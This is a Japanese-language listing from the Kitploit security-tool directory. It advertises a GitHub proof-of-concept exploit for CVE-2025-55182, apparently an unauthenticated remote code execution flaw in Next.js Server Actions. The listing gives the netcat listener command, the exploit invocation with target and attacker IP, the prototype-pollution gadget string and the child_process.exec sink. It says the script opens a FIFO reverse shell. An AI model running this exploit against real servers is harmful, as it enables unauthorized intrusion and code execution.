Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/uwugreed/cve-2025-55182-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

Hack the Boxから来たのであれば、おそらくご存知でしょうが、もしそうなら、これは実際に動作します。

リポジトリを見る
7時間42分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182-poc

CVE-2025-55182 の概念実証(PoC)エクスプロイトです。Next.js Server Actions の認証不要のリモートコード実行(RCE)脆弱性を標的としています。

このエクスプロイトは、React Server Components(RSC)のマルチパートペイロードの逆シリアル化中にプロトタイプ汚染を悪用し、非同期・非ブロッキングの実行フローを使用して Node.js プロセスに悪意のあるコマンドを注入します。


特徴

  • 非同期実行: ブロッキングする execSync() API の代わりに child_process.exec() を使用し、コンテナノードでのスレッドハングを防止します。
  • 堅牢なマルチシェル配信: POSIX 準拠の FIFO パイプリバースシェル文字列を活用し、最小限の Linux コンテナエンジン全体で最大の実行安定性を実現します。
  • 外部依存関係なし: Python 標準の requests ライブラリのみで完全に構築されています。

使用方法

1. リスナーのセットアップ

攻撃ホストでターミナルを開き、受信するリバース接続をキャッチするために netcat ソケットリスナーを起動します:

root@kitploit:~
nc -lvnp 4444

2. スクリプトの実行

ターゲットのベース URL、ローカルホストのインターフェース IP、希望するリスナーポートを指定します:

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

例:

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

技術詳細

このスクリプトは、必要な Next-Action ルーティングヘッダーを付けて、細工された生のマルチパートペイロードをアプリケーションのルーティングエンドポイントに直接送信します。

{"get":"$1:constructor:constructor"} によるオブジェクト構築シグネチャを活用することで、逆シリアライザエンジンがネイティブオブジェクトツリーを汚染します。付随するパラメータを処理する際、悪意を持って埋め込まれた _response コンテキストブロックを命令キューとして解釈し、実行中の Node サーバーユーザーコンテキストの権限でコード実行を可能にします。

root@kitploit:~
// 基盤となるベクターターゲット:
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ 免責事項

このスクリプトは、教育目的、許可されたセキュリティテスト、および Hack The Box などのラボでの脆弱性フラグの取得のためにのみ作成されています。作者は、このユーティリティによって引き起こされる誤用、不正なシステム侵入、または損害について一切の責任を負いません。

ツールをダウンロード